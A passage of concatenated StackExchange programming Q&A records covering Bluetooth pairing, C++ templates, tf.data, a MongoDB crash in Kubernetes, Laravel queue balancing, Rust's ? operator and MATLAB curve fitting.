This works great.\nFor testing purposes, while the service is running, I, manually, unpair and then pair it again. When I do this, I get the pairing and connect, but then I receive ACTION_ACL_DISCONNECTED.\nIn short, it looks like this:\nWhen I pair, I get the following:\n<code>I\/MainService\ufe55 Entering Service bcrcvrBluetooth bcReceiver: Action = android.bluetooth.device.action.BOND_STATE_CHANGED\nI\/MainService\ufe55 Service bcrcvrBluetooth: action = BluetoothDevice.ACTION_BOND_STATE_CHANGED\nI\/MainService\ufe55 Prev State: BluetoothDevice.BOND_NONE\nI\/MainService\ufe55 New State: BluetoothDevice.BOND_BONDING\n<\/code>\nThen it is time to enter the pin. Afterwards, I see the following:\n<code>I\/MainService\ufe55 Entering Service bcrcvrBluetooth bcReceiver: Action = android.bluetooth.device.action.ACL_CONNECTED\nI\/MainService\ufe55 Service bcrcvrBluetooth: action = BluetoothDevice.ACTION_ACL_CONNECTED\n\nI\/BTDevice\ufe55 Creating socket\nI\/BTDevice\ufe55 Device socket created\n\nI\/MainService\ufe55 Entering Service bcrcvrBluetooth bcReceiver: Action = android.bluetooth.device.action.BOND_STATE_CHANGED\nI\/MainService\ufe55 Service bcrcvrBluetooth: action = BluetoothDevice.ACTION_BOND_STATE_CHANGED\nI\/MainService\ufe55 Prev State: BluetoothDevice.BOND_BONDING\nI\/MainService\ufe55 New State: BluetoothDevice.BOND_BONDED\nI\/MainService\ufe55 Device Paired.\n\nI\/MainService\ufe55 Entering Service bcrcvrBluetooth bcReceiver: Action = android.bluetooth.device.action.ACL_DISCONNECTED\nI\/MainService\ufe55 Service bcrcvrBluetooth: action = BluetoothDevice.ACTION_ACL_DISCONNECTED\n<\/code>\nIdeally, I would include some code to help; however, it is spread out across multiple classes, threads, and etc... The short version is that everything looks great until I receive the ACL_DISCONNECTED for some unknown reason. This throws my code into handling a case where a device that has been removed. If I could narrow my search, I'll gladly post some code.\nWhy would I receive ACL_DISCONNECTED after pairing?\nEDIT:\nFor anyone else who might make the same stupid mistake I did. It turns out that I was attempting to create the BT socket before I received ACTION_BOND_STATE_CHANGED with BOND_BONDED. This seems to have caused an ACTION_ACL_DISCONNECTED. I would have expected an error in this case, but I guess not. Problem solved\nAnswer: Just one more comment. What you are describing is valid not only for RFCOMM, but also for A2DP. Take care that the method createBond() NOT ALWAYS make the bond and profile connection (it depends on the hardware, I have tested with different)\nSo, the correct way to do that is to call createBond(), wait for BOND_BONDED event, and then make a connection to the A2DP proxy. After the A2DP_CONNECTED event, the conction is reliable\n","meta":{"source":"stackoverflow","title":"Why do I receive ACTION_ACL_DISCONNECTED after pairing","dup_signals":{}},"subset":"stackexchange"} +{"text":"Tail-recursive function to count all numbers larger than average in an array\n\nQuestion: I need to make a function that calculates the average and return the number of values larger than the average. For example, passing an array of {4, 5, 12, 17} should return 2 (because 12 and 17 are larger than the average 9.5). 
So far I wrote the function to return the average, but how can I make it count the numbers larger than the average and keep it tail-recursive?\n<code>int TAvg(int* a, int size, int acc=0, int num=0){ \/\/acc is the sum so far, num is the number of all elements\nif (size == 0){ \n return (acc \/ num); \n}\nreturn TAvg(a, size - 1, acc+a[size-1], num+1);}\n<\/code>\nAny help would be appreciated. Thank you.\nComment: Seems you want us to solve your homework.\nComment: \"but how can I make it count the numbers larger than the average and keep it tail-recursive?\" I don't think you can.\nComment: By *average*, you seem to have meant *arithmetic mean* specifically.\nComment: Take a look to STL ``: http:\/\/en.cppreference.com\/w\/cpp\/algorithm\nComment: And try to use `vector` instead C array and pointer. Unless it is a C question instead a C++ question, in such case I would suggest you that update the tags\nComment: Two quotes from your question (1) `int TAvg(` (2) `average 9.5`. Don't think they can work together well.\nComment: Can you write a separate tail-recursive function that calculates number of array elements above a given value?\nAnswer: Once your tail-recursive function calculates the average on the final recursion call, and starts unwinding the call stack, as its unwinding the recursive calls it now knows what the average is.\nIt can now compare the average with each element, as its unwinding all the recursion calls, and increment a counter for each element is above the computed average.\nEDIT: I thought of another approach that implements more of a spirit of a tail-recursive design. Have your function return a class:\n<code>class result {\n\npublic:\n\n int average;\n int counter;\n\n result(int average, int last_value) : average(average), counter(0)\n {\n if (last_value > average)\n ++counter;\n }\n\n result(const result &prev_result, int next_value) : average(prev_result.average), counter(prev_result.counter)\n {\n if (next_value > average)\n ++counter;\n }\n};\n<\/code>\nNow your tail-recursive function can compute the result by:\n\nThe initial recursive call (or the last recursive call, depending on one's point of view), would construct <code>result<\/code> by using the first constructor, using the computed average, and the first\/last value in the array:\n<code>return result(TAvg(computed_average_goes_here, *acc));\n<\/code>\nThe remaining tail-recursive calls become:\n<code>return result( TAvg( \/* resursive parameters *\/), *acc);\n<\/code>\nComment: A tail recursive function **does not** unwind the stack. That's the point of it being tail-recursive. It can be compiled to code that doesn't use call stack at all.\nComment: Exactly, but how do i do that? and where should i place the counter? since it's tail-recursive nothing should be written after the call.\nComment: There is no law that says that \"nothing should be written after the call\" does not make it tail recursive. 
You can have your tail-recursive function return a std::pair, the average, and the counter, and turn your recursive call into `update(TAvg(...), *acc)`, with `update()` comparing `*acc` with the first value in the pair, and incrementing the second value, and returning the updated pair.\n","meta":{"source":"stackoverflow","title":"Tail-recursive function to count all numbers larger than average in an array","dup_signals":{}},"subset":"stackexchange"} +{"text":"C++ templates problem\n\nQuestion: I have defined a generic tree-node class like this:\n<code>template<class DataType>\nclass GenericNode\n{\npublic:\n GenericNode() {}\n\n GenericNode(const DataType & inData) : mData(inData){}\n\n const DataType & data() const\n { return mData; }\n\n void setData(const DataType & inData)\n { mData = inData; }\n\n size_t getChildCount() const\n { return mChildren.size(); }\n\n const GenericNode * getChild(size_t idx) const\n { return mChildren[idx]; }\n\n GenericNode * getChild(size_t idx)\n { return mChildren[idx]; }\n\n void addChild(GenericNode * inItem)\n { mChildren.push_back(inItem); }\n\nprivate:\n DataType mData;\n typedef std::vector<GenericNode*> Children;\n Children mChildren;\n};\ntypedef GenericNode<std::string> TreeItemInfo;\n<\/code>\nAnd I would like to make it more generic by making the child pointer type customizable. For example to allow using a smart pointer type. Naively I tried this:\n<code>template<class DataType, class ChildPtr>\nclass GenericNode\n{\npublic:\n GenericNode() {}\n\n GenericNode(const DataType & inData) : mData(inData){}\n\n const DataType & data() const\n { return mData; }\n\n void setData(const DataType & inData)\n { mData = inData; }\n\n size_t getChildCount() const\n { return mChildren.size(); }\n\n const ChildPtr getChild(size_t idx) const\n { return mChildren[idx]; }\n\n ChildPtr getChild(size_t idx)\n { return mChildren[idx]; }\n\n void addChild(ChildPtr inItem)\n { mChildren.push_back(inItem); }\n\nprivate:\n DataType mData;\n typedef std::vector<ChildPtr> Children;\n Children mChildren;\n};\n\ntypedef GenericNode<std::string, GenericNode<std::string > * > TreeItemInfo;\n<\/code>\nHowever, that doesn't work of course because I need to specify the second parameter for the second parameter for the second parameter etc... into eternity.\nIs there a way to solve this puzzle?\nEDIT\nI found a solution based on @Asaf's answer. 
For those interested, below is a full code sample (comments are welcome).\nEDIT2\nI modified the interface so that externally always raw pointers are used.\n<code>#include <string>\n#include <vector>\n#include <boost\/shared_ptr.hpp>\n#include <assert.h>\n\ntemplate <class PointeeType>\nstruct NormalPointerPolicy\n{\n typedef PointeeType* PointerType;\n\n static PointeeType* getRaw(PointerType p)\n {\n return p;\n }\n};\n\ntemplate <class PointeeType>\nstruct SharedPointerPolicy\n{\n typedef boost::shared_ptr<PointeeType> PointerType;\n\n static PointeeType* getRaw(PointerType p)\n {\n return p.get();\n }\n};\n\ntemplate <class DataType, template <class> class PointerPolicy>\nclass GenericNode\n{\npublic: \n GenericNode() { }\n\n GenericNode(const DataType & inData) : mData(inData) { }\n\n typedef GenericNode<DataType, PointerPolicy> This;\n\n typedef typename PointerPolicy<This>::PointerType ChildPtr;\n\n const This * getChild(size_t idx) const\n { return PointerPolicy<This>::getRaw(mChildren[idx]); }\n\n This * getChild(size_t idx)\n { return PointerPolicy<This>::getRaw(mChildren[idx]); }\n\n void addChild(This * inItem)\n { \n ChildPtr item(inItem);\n mChildren.push_back(item);\n }\n\n const DataType & data() const\n { return mData; }\n\n void setData(const DataType & inData)\n { mData = inData; }\n\nprivate:\n DataType mData;\n std::vector<ChildPtr> mChildren;\n};\n\ntypedef GenericNode<std::string, NormalPointerPolicy> SimpleNode;\ntypedef GenericNode<std::string, SharedPointerPolicy> SmartNode;\n\nint main()\n{\n SimpleNode simpleNode;\n simpleNode.addChild(new SimpleNode(\"test1\"));\n simpleNode.addChild(new SimpleNode(\"test2\"));\n SimpleNode * a = simpleNode.getChild(0);\n assert(a->data() == \"test1\");\n const SimpleNode * b = static_cast<const SimpleNode>(simpleNode).getChild(1);\n assert(b->data() == \"test2\");\n\n SmartNode smartNode;\n smartNode.addChild(new SmartNode(\"test3\"));\n smartNode.addChild(new SmartNode(\"test4\"));\n SmartNode * c = smartNode.getChild(0);\n assert(c->data() == \"test3\");\n SmartNode * d = static_cast<const SmartNode>(smartNode).getChild(1);\n assert(d->data() == \"test4\");\n return 0;\n}\n<\/code>\nAnswer: Not the way you look at it. 
You should combine some kind of inheritance here.\nTry this, for example:\n<code>template <class PointeeType>\nstruct NormalPointerPolicy\n{\n typedef PointeeType* PointerType;\n};\n\ntemplate <class PointeeType>\nstruct SmartPointerPolicy\n{\n typedef MySmartPtrClass<PointeeType> PointerType;\n};\n\ntemplate <class DataType>\nclass BaseGenericNode\n{\npublic:\n BaseGenericNode() {}\n\n BaseGenericNode(const DataType & inData) : mData(inData){}\n\n const DataType & data() const\n { return mData; }\n\n void setData(const DataType & inData)\n { mData = inData; }\n\nprotected:\n DataType mData;\n\n};\n\ntemplate <class DataType, template <class> class PointerPolicy>\nclass GenericNode : public BaseGenericNode<DataType>\n{\n typedef typename PointerPolicy<BaseGenericNode<DataType> >::PointerType ChildPtr;\n\nprivate:\n typedef std::vector<ChildPtr> Children;\n Children mChildren;\n};\n<\/code>\nThe GenericNode is the actual node type, which holds the base type 'BaseGenericNode'.\nThe base type holds the actual data (and its related functionality), and the derived class holds the links to other nodes.\nThere are 2 template policy classes for how your pointer actually looks like, and you use them like this:\n<code>GenericNode<int, NormalPointerPolicy> instance;\nGenericNode<int, SmartPointerPolicy> instance;\n<\/code>\nThe problem (or advantage?) of this implementation is that a node with pointers of one kind, can hold child nodes with pointers of another kind.\n","meta":{"source":"stackoverflow","title":"C++ templates problem","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using tf.data.experimental.make_csv_dataset for time series data\n\nQuestion: How do I use <code>tf.data.experimental.make_csv_dataset<\/code> with CSV files containing time series data?\n<code>building_dataset = tf.data.experimental.make_csv_dataset(file_pattern=csv_file,\n batch_size=5,num_epochs=1, shuffle=False,select_columns=feature_columns)\n<\/code>\nAnswer: It is assumed that the CSV file is already sorted w.r.t. time. First, read the CSV file using:\n<code>building_dataset = tf.data.experimental.make_csv_dataset(file_pattern=csv_file,\n batch_size=5,num_epochs=1, shuffle=False,select_columns=feature_columns)\n<\/code>\nThen define a <code>pack_features_vector<\/code> to convert to a features vector and unbatch using flat_map(). 
The tensors are also cast to float32.\n<code>def pack_features_vector(features):\n \"\"\"Pack the features into a single array.\"\"\"\n \n features = tf.stack([tf.cast(x,tf.float32) for x in list(features.values())], axis=1)\n return features\n\n \nbuilding_dataset = building_dataset.map(pack_features_vector)\nbuilding_dataset = building_dataset.flat_map(lambda x: tf.data.Dataset.from_tensor_slices(x))\nfor feature in building_dataset.take(1):\n print('Stacked tensor:',feature)\n<\/code>\nThen use the window and flat map method.\n<code>building_dataset = building_dataset.window(window_size, shift=1, drop_remainder=True)\nbuilding_dataset = building_dataset.flat_map(lambda window: window.batch(window_size))\n<\/code>\nThen use map method to separate features and labels.\n<code>building_dataset = building_dataset.map(lambda window: (window[:,:-1], window[-1:,-1]))\nfor feature, label in building_dataset.take(5):\n print(feature.shape)\n print('feature:',feature[:,0:4])\n print('label:',label)\n<\/code>\nFinally create batches using batch() and use as inputs to model training.\n<code>building_dataset = building_dataset.batch(32)\n<\/code>\nComment: #siby clean and clear, juste 2 question: When you \"unbatch using flat_map()\" can we just don't apply \"batch_size=5\" in the .make_csv_dataset call? Is flat_map is only to keep original orther?\n","meta":{"source":"stackoverflow","title":"Using tf.data.experimental.make_csv_dataset for time series data","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can't Type Password in Terminal\n\nQuestion: When I type any command and after that it asks for password but I can't type that. For example in terminal I type sudo apt-get update and after pressing enter, it asks for password. I type password but nothing appears in the terminal. Whatever i type it don't get typed in case of password. And for each command it asks for password. Any Solution for this? \nComment: This is how it works. The password is not echoed even with stars. Just type your password and hit Enter.\nComment: @chaskes I think it's a security precaution, i.e. the length of the password shouldn't be known either.\nComment: @chaskes Nope. This question asks for a solution, and there is pretty much nothing which can be added to the answer. I don't want to spark a discussion like \"why shouldn't the length of the password be known either?\"\nAnswer: It's typed, but you don't see stars. Try typing it then hitting Enter. Does it help?\nComment: @TrueBeliever Remember to click the checkmark if this solved your problem.\n","meta":{"source":"askubuntu","title":"Can't Type Password in Terminal","dup_signals":{}},"subset":"stackexchange"} +{"text":"User Deprecated Error Symfony 2\n\nQuestion: I am getting below error when I am going to register page !\nException detected!\nUser Deprecated: FOS\\UserBundle\\Entity\\User is deprecated. Extend FOS\\UserBundle\\Model\\User directly. in \/opt\/lampp\/htdocs\/joppers\/vendor\/friendsofsymfony\/user-bundle\/FOS\/UserBundle\/Entity\/User.php line 23\n500 Internal Server Error - ErrorException \nwhat should i do to resolve this error ? \nnew to symfony 2 .\nAnswer: You should extend <code>FOS\\UserBundle\\Model\\User<\/code> directly. Not <code>FOS\\UserBundle\\Entity\\User<\/code> that was used in older versions. 
And read the documentation for your version or check CHANGELOGs.\n","meta":{"source":"stackoverflow","title":"User Deprecated Error Symfony 2","dup_signals":{}},"subset":"stackexchange"} +{"text":"CrashLoopBackOff (Mongo in Docker\/Kubernetes) - Failed to start up WiredTiger under any compatibility version\n\nQuestion: I'm suddenly facing some issues in my Kubernetes application (with no event to explain it). The application has been working properly during one year but now I'm getting a CrashLoopBackOff status.\n\nIMPORTANT UPDATE:\nI cannot update the Mongo replication controller in GKE, because when I commit the changes in mongo.yml (from GIT) all workloads update except mongo-controller (which is down).\nIn GKE in Workloads\/Mongo-controller\/Managed pods I can see that the \"Created on\" date is some days ago when the app was up. The rest of pods are updating with my commits. I don't want to delete the Mongo pod, because I suppose that we'd lost the database info\/content. (The developer who created the cluster pipeline didn't schedule a backup).\n\nDatabase: MongoDB (latest, not sure what was the one running properly)\nOS: Pod running on Ubuntu 18.04\nCLuster: Google Cloud Kubernetes Engines (a.k.a GKE)\nKubectl get pods\n<code>mongo-controller-dgkkg 0\/1 CrashLoopBackOff 1199 4d6h\n<\/code>\nLogs of Mongo POD\nAutomatically disabling TLS 1.0, to force-enable TLS 1.0 specify --sslDisabledProtocols 'none'\nNo TransportLayer configured during NetworkInterface startup\"}\nImplicit TCP FastOpen unavailable. If TCP FastOpen is required, set tcpFastOpenServer, tcpFastOpenClient, and tcpFastOpenQueueSize.\nMongoDB starting\",\"attr\":{\"pid\":1,\"port\":27017,\"dbPath\":\"\/data\/db\",\"architecture\":\"64-bit\",\"host\":\"mongo-controller-dgkkg\"}\nBuild Info\",\"attr\":{\"buildInfo\":{\"version\":\"4.4.1\",\"gitVersion\":\"ad91a93a5a31e175f5cbf8c69561e788bbc55ce1\",\"openSSLVersion\":\"OpenSSL 1.1.1 11 Sep 2018\",\"modules\":[],\"allocator\":\"tcmalloc\",\"environment\":{\"distmod\":\"ubuntu1804\",\"distarch\":\"x86_64\",\"target_arch\":\"x86_64\"}}}\nOperating System\",\"attr\":{\"os\":{\"name\":\"Ubuntu\",\"version\":\"18.04\"}}\nOptions set by command line\",\"attr\":{\"options\":{\"net\":{\"bindIp\":\"*\"}}}\nStorage engine to use detected by data files\",\"attr\":{\"dbpath\":\"\/data\/db\",\"storageEngine\":\"wiredTiger\"}\nUsing the XFS filesystem is strongly recommended with the WiredTiger storage engine. See http:\/\/dochub.mongodb.org\/core\/prodnotes-filesystem\",\"tags\":[\"startupWarnings\"]\nOpening WiredTiger\",\"attr\":{\"config\":\"create,cache_size=1336M,session_max=33000,eviction=(threads_min=4,threads_max=4),config_base=false,statistics=(fast),log=(enabled=true,archive=true,path=journal,compressor=snappy),file_manager=(close_idle_time=100000,close_scan_interval=10,close_handle_minimum=250),statistics_log=(wait=0),verbose=[recovery_progress,checkpoint_progress,compact_progress]\nFailed to start up WiredTiger under any compatibility version. 
This may be due to an unsupported upgrade or downgrade.\",\"attr\":{\"reason\":\"95: Operation not supported\"}}\nFatal assertion\",\"attr\":{\"msgid\":28595,\"file\":\"src\/mongo\/db\/storage\/wiredtiger\/wiredtiger_kv_engine.cpp\",\"line\":1101}}\n\\n\\n***aborting after fassert() failure\\n\\n\nMy Mongo.yml:\n<code>apiVersion: v1\nkind: Service\nmetadata:\n name: mongo\n namespace: $KUBE_NAMESPACE-$CI_ENVIRONMENT_SLUG\n labels:\n name: mongo\nspec:\n ports:\n - port: 27017\n targetPort: 27017\n selector:\n name: mongo\n---\napiVersion: v1\nkind: ReplicationController\nmetadata:\n name: mongo-controller\n namespace: $KUBE_NAMESPACE-$CI_ENVIRONMENT_SLUG\n labels:\n name: mongo\nspec:\n replicas: 1\n template:\n metadata:\n labels:\n name: mongo\n spec:\n containers:\n - image: mongo\n name: mongo\n ports:\n - name: mongo\n containerPort: 27017\n hostPort: 27017\n volumeMounts:\n - name: mongo-persistent-storage\n mountPath: \/data\/db\n volumes:\n - name: mongo-persistent-storage\n gcePersistentDisk:\n pdName: mongo-disk-$CI_ENVIRONMENT_SLUG\n fsType: ext4\n<\/code>\nPD: Maybe I should update my ReplicationController to a Deployment (recommended), but being a database container we always configure it in that way. However I tried that, and nothing changed.\nComment: Maybe your mongo image was updated because you aren't specifying a tag; it means you are always pulling the latest version. Do you know the stable version you were running before?\nComment: What's the best practice to specify the tag version of Mongo? Thanks\nComment: I have the same issue, but in my case I just installed it on a new server. I'm testing MongoDB on ARM and it does not start because of this message.\nComment: @AlexAcc, [Here](https:\/\/hub.docker.com\/_\/mongo?tab=description) you can find all tags. Do you know which version was working?\nAnswer: I solved this issue by editing the Replication Controller online from the Google Cloud Console.\nGo to: \"Kubernetes Engine\" > \"Workload\" > \"mongo-controller\" > \"Managed pods\" > \"mongo-controller-XXXXX\"\n...and press the EDIT button (in the top navbar). You can edit the configuration online in real time. I simply specified the Mongo version (4.2.10) in the image, and everything worked as expected.\n<code> spec:\n replicas: 1\n selector:\n name: mongo\n template:\n metadata:\n creationTimestamp: null\n labels:\n name: mongo\n spec:\n containers:\n - image: mongo:4.2.10\n\n (...)\n<\/code>\n","meta":{"source":"stackoverflow","title":"CrashLoopBackOff (Mongo in Docker\/Kubernetes) - Failed to start up WiredTiger under any compatibility version","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it possible to balance queued jobs per user\n\nQuestion: User A can trigger a process that can dispatch over 1,000 jobs to a queue. If user B triggers the same process, they need to wait until user A's jobs are finished since it's the same job on the same queue.
So in above case, it should process jobs from user A and B simultaneously, slowing down the jobs of user A to accommodate user B.\nI am using horizon, but not sure how to setup above configuration.\n<code>\/\/ dispatch 1000 jobs for user A and B on different requests\nProcessCSV::dispatch()->onQueue('default');\n\n\/\/ horizon.php\n'supervisor' => [\n 'connection' => 'redis',\n 'queue' => ['default'],\n 'balance' => 'auto',\n ...\n]\n<\/code>\nThe only way I could think of accomplishing my use case is having some random queues, however this is not ideal, as the same random numbers might happen between requests, and if more users trigger the jobs it will also not work as expected.\nFor example:\n<code>\/\/ request A dispatch 1000 jobs for user A\n$userA = rand(1, 5);\nProcessCSV::dispatch()->onQueue($userA);\n\n\/\/ request B dispatch 1000 jobs for user B\n$userB = rand(1, 5);\nProcessCSV::dispatch()->onQueue($userB);\n\n\/\/ horizon.php\n'supervisor' => [\n 'connection' => 'redis',\n 'queue' => ['1', '2', '3', '4', '5'],\n 'balance' => 'auto',\n ...\n]\n<\/code>\nComment: You can use [unique queue jobs](https:\/\/laravel.com\/docs\/10.x\/queues#unique-jobs) and return the user id in method `uniqueId`. So one job for each user will run only one time at same time\nComment: why would you want to do that? instead of user A waiting 2 min and user B waiting 4 min, now both users would need to wait 4 min, since they would both finish around the same time.\nComment: @ArayikG. thanks for the suggestions, might be useful, but I want to run multiple jobs per user at the same time...\nComment: @krisgjika it could take over 30 min to process 1,000 jobs, and I am showing a progress bar to users. I want to distribute the load among users so they can see some progress\nComment: @BernardWiesner a queue is a first in, first out system, without knowing your exact use case, I would say it would be better to tell the user that their process is pending, and you can even update them on their place on the queue, and after it's their turn you can update them on the progress of their job.\nAnswer: In the end I decided to use a combination of <code>Bus::batch<\/code> and multiple queues. I check which queue is free and pick that queue. If all are busy I just pick the first one. It works well with progress bars and for load balancing the same jobs among queues.\n<code>$jobs = [];\nforeach ($this->getData() as $data) {\n \/\/ Can contain over 1000 entries\n $jobs[] = new ProcessData($data);\n}\n\nBus::batch($jobs)\n ->onQueue(Queue::getFreeQueue())\n ->dispatch();\n\n<\/code>\n<code>namespace App\\Jobs;\n\nuse Illuminate\\Bus\\BatchRepository;\n\nclass Queue\n{\n const QUEUES = [\n 'queue-1',\n 'queue-2',\n 'queue-3',\n 'queue-4',\n 'queue-5',\n ];\n\n public static function getFreeQueue(): string\n {\n $queues = array_flip(self::MIGRATE_QUEUES);\n\n \/** @var BatchRepository $batches *\/\n $batches = app(BatchRepository::class);\n $batches = $batches->get(limit: 10, before: null);\n foreach($batches as $batch) {\n \/** @var Batch $batch *\/\n if(!$batch->finished()) {\n unset($queues[$batch->queue]);\n }\n }\n $availableQueues = array_keys($queues);\n return $availableQueues[0] ?? self::QUEUES[0];\n }\n\n}\n<\/code>\nAnd horizon:\n<code>'supervisor' => [\n 'connection' => 'redis',\n 'queue' => Queue::QUEUES,\n 'balance' => 'auto',\n ...\n<\/code>\n","meta":{"source":"stackoverflow","title":"Is it possible to balance queued jobs per user","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using the ? 
operator in a void\/unit function\n\nQuestion: I've found myself in a context where I need to do a lot of array indexing, but where i simply ignore the case where it isn't present.\nThe None case is possible, so I can't use unsafe code here; i simply want to ignore it and return early\nI end up with a lot of the following:\n<code>let Some(item) = some_vec.get(i) else { return; }\n<\/code>\nI would much prefer to be able to do something like\n<code>let item = some_vec.get(i)?;\n<\/code>\nIs there a way to have this work?\nThe only thing i can think of is to have an <code>#[inline(always)]<\/code> wrapper function that calls a private function that returns an Option, so I can use <code>?<\/code> in that context.\n<code>fn inner(i: usize) -> Option<SomeResidual>;\npub fn outer(i: usize) {\n inner(i);\n}\n\n\/\/ Some struct\/residual impl so i can use ? on some generic Option<T>\n<\/code>\nThat just feels clunky, though, and I would hope that there's a better way\nComment: You don't need `SomeResidual`; just use `Option<()>` and return `Some(())` at the end.\nComment: You could do the same with an immediately-invoked closure, which is the way I usually see people solve this kind of thing. `fn foo() { (|| { \/* ... *\/ })(); }`\nComment: I'd personally advocate for the private `inner` helper. Alternatively, is there any remotely useful result you can return from the `outer` function to get the `Option`? Even an `Option<()>` would alert the caller to whether or not an error occurred, and it would permit the `?` syntax.\nComment: Do you really need to break of the entire calculation in case the index is invalid? Or do you need to only skip part of the calculation (the part about this index)?\nAnswer: If you're ok with nightly features, you can implement your own type that can be <code>?<\/code>'d in functions returning <code>()<\/code>:\n<code>#![feature(try_trait_v2, never_type)]\nuse std::ops::{Try, FromResidual, ControlFlow};\n\n\/\/ The `Try` type we'll be using to make `?` allow returning `()`\nstruct SomeOrReturn<T>(Option<T>);\n\n\/\/ Boilerplate impl\nimpl<T> Try for SomeOrReturn<T> {\n type Output = T;\n type Residual = SomeOrReturn<!>;\n\n fn from_output(output: Self::Output) -> Self {\n Self(Some(output))\n }\n\n fn branch(self) -> ControlFlow<Self::Residual, Self::Output> {\n match self.0 {\n Some(value) => ControlFlow::Continue(value),\n None => ControlFlow::Break(SomeOrReturn(None)),\n }\n }\n}\n\n\/\/ Boilerplate impl\nimpl<T> FromResidual<SomeOrReturn<!>> for SomeOrReturn<T> {\n fn from_residual(_residual: SomeOrReturn<!>) -> Self {\n Self(None)\n }\n}\n\n\/\/ The magical impl that allows you to use `?` on `SomeOrReturn<T>`\n\/\/ inside an `fn(...) 
-> ()`.\nimpl FromResidual<SomeOrReturn<!>> for () {\n fn from_residual(_residual: SomeOrReturn<!>) -> Self {}\n}\n\n\/\/ Extension trait to go from an `Option<T>` to a `SomeOrReturn<T>`.\ntrait AsSomeOrReturn<T> {\n fn some_or_return(self) -> SomeOrReturn<T>;\n}\nimpl<T> AsSomeOrReturn<T> for Option<T> {\n fn some_or_return(self) -> SomeOrReturn<T> {\n SomeOrReturn(self)\n }\n}\n<\/code>\nThe `Try` and `FromResidual` impls cause a fair bit of boilerplate, and I've also added an extension trait to make the interface easier, but you could stash this away in some utils module and just use the extension trait.\nThen use it as such:\n<code>fn b() -> Option<usize>;\nfn c() -> Option<usize>;\n\nfn main() {\n let b = b().some_or_return()?;\n let c = c().some_or_return()?;\n \/\/ ...\n}\n<\/code>\n(See the playground)\n","meta":{"source":"stackoverflow","title":"Using the ? operator in a void\/unit function","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to minimize a function without using a loop\n\nQuestion: I have a function (ExpSemivariance) that creates a vector of 11 elements. These elements are then represented on a graph as a scatter diagram, and I intend to find the curve (Theoretical) that best fits 'ExpSemivariance' by using the minimum residual (in this case, but any other minimization function can be used)\n<code>Nug = 5;\nSill = 7899;\nalpha = 1.7;\n\nStep = 10;\nq = 11;\n\n for i=1:q\n Theoretical(i,1) = Nug+Sill*(1-exp(-(Lag(i,1)\/R)^alpha));\n end\n Error = sum(abs(Theoretical-ExpSemivariance));\n while Step > 1\n R = R + Step;\n for i=1:q\n Theoretical(i,1) = Nug+Sill*(1-exp(-(Lag(i,1)\/R)^alpha));\n end\n error = sum(abs(Theoretical-ExpSemivariance));\n if error > Error\n R = R - Step;\n Step = Step\/2;\n else\n Error = error;\n end\n end\n<\/code>\nWith the only variable being 'R', the script above works quite well. \nThe problem is, I am assuming alpha is 1.7. But I actually need to find the correct values of alpha (ranging from 1:2, steps 0.1) and R (ranging from 1-4000) simultaneously which best minimize the error (between ExpSemivariance and Theoretical). Is there an appropriate way to do this?\nThanks\nAnswer: I think you best look into mathematical optimization, because I have the impression you are trying to re-invent the wheel a bit (e.g. the <code>sum(abs(x))<\/code> is a lot less common than e.g. <code>sum(x.^2)<\/code> in optimization since the latter is quite a bit easier to solve since the derivatives of the latter are easy to compute; also, the way you choose <code>step<\/code> seems a bit uncommon to me).\nIn MATLAB, if you have the optimization toolbox, many of the relevant algorithms are already implemented for you. They are a reliable way to get good results (unless you want perfect control of the optimization algorithm you use), such that you don't have to roll your own algorithms (which are probably not as reliable). 
Also, if you look around on the internet, I'm quite positive you should be able to find free implementations that have similar functionality.\nApproach 1: discrete grids \/ brute force\nIf what you want, is really to minimize that misfit between your function and data for some discrete values of <code>R = {1, ..., 4000}<\/code> and <code>alpha = {1, 1.1, ..., 2}<\/code>, then I would either use a <code>for<\/code> loop over all those variables or use vectorization to possibly speed this up.\n<code>% still requires Lag, ExpSemivariance\nNug = 5;\nSill = 7899;\n\nmodel = @(R, alpha) Nug + Sill .* ( 1 - exp(-(Lag.\/R).^alpha));\ncost = @(R, alpha) sum(abs(model(R, alpha) - ExpSemivariance));\n\nR = 1:4000;\nalpha = 1:0.1:2;\n\n% this creates matrices (RR, alphaalpha) for all combinations of values (R, alpha)\n[RR, alphaalpha] = ndgrid(R, alpha);\n\n% now evaluate it over the complete grid of combinations\nerror = arrayfun(cost, RR, alphaalpha);\n\nerrorMin = min(error(:)); % compute the minimum\nidxMinimum = find(error==errorMin); % find it in your results\nRMin = RR(idxMinimum);\nalphaMin = alphaalpha(idxMinimum);\n\n% since this is 2D, you can still visualize this:\nfigure;\nmesh(R, alpha, error); hold all;\nplot3(RMin, alphaMin, errorMin, '.k')\nxlabel('R');\nylabel('alpha');\nzlabel('error');\n<\/code>\nCertainly, there are better algorithms (but I'm not familiar enough with them; all that I know is that it's in general quite a hard problem).\nAlso, note that my approach is very brute-force and hence scales quite poorly: adding more variables, or scanning over a finer grid will quickly exhaust your computer's resources. If that's the case, it really pays off to gradually scan the grid, or use multiple for loops where you keep track of the best value seen so far.\nApproach 2: continuous variables \/ optimization based\nThis is the more common problem in optimization (and, I think, also the problem you are trying to solve). It assumes that <code>R<\/code> and <code>alpha<\/code> are real values (so can take any value, possibly within a certain range), such that you can let an optimization algorithm do the looping for you to determine the values that minimize the objective function.\nIn your case, if you are sure about those ranges of <code>R<\/code> and <code>alpha<\/code>, I would look into the <code>fmincon<\/code> function. From the top of my head (i.e. no guarantees the code works), I think you should be able to call it as:\n<code>% still requires Lag, ExpSemivariance\nNug = 5;\nSill = 7899;\n\nR = [1 10 4000]; % minimum, initial guess, maximum\nalpha = [1 1.7 2 ]; % minimum, initial guess, maximum\ntheta = [R; alpha]; % parameter vector for optimization toolbox\nthetaMin = theta(:,1);\nthetaMax = theta(:,3);\nthetaInit = theta(:,2);\n\nmodel = @(R, alpha) Nug + Sill .* ( 1 - exp(-(Lag.\/R).^alpha));\nerror = @(R, alpha) sum(abs(model(R, alpha) - ExpSemivariance));\nobjective = @(theta) error(theta(1), theta(2));\n\n% execute \"help fmincon\"\/\"doc fmincon\" for more information about this\nthetaOpt = fmincon(objective, thetaInit, [], [], [], [], thetaMin, thetaMax);\nRMin = thetaOpt(1)\nalphaMin = thetaOpt(2)\n<\/code>\nThis approach generalizes quite well to more variables and to bigger ranges (in fact, even infinite ranges are feasible with this approach).\nThe actual looping happens within <code>fmincon<\/code> that uses well-tested algorithms to determine what steps it should take to improve your fit. 
